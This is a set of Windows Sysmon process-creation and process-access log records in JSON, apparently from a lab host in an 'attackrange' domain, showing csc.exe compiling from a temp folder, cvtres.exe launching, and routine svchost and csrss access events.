{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-0010E7BB0600}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-0010E7BB0600}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.417\r\nProcessGuid: {E2A3D6B1-11C2-5F25-0000-001001C00600}\r\nProcessId: 3788\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES9C76.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\CSC896096922971480D94AEED362F6C7EE0.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11C2-5F25-0000-0010E7BB0600}\r\nParentProcessId: 4416\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.417","ProcessGuid":"{E2A3D6B1-11C2-5F25-0000-001001C00600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES9C76.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\CSC896096922971480D94AEED362F6C7EE0.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11C2-5F25-0000-0010E7BB0600}","ParentProcessId":"4416","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.cmdline\"","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-11C2-5F25-0000-0010E7BB0600}\r\nSourceProcessId: 4416\r\nSourceThreadId: 2268\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001001C00600}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-11C2-5F25-0000-0010E7BB0600}","SourceProcessId":"4416","SourceThreadId":"2268","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001001C00600}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001001C00600}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001001C00600}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
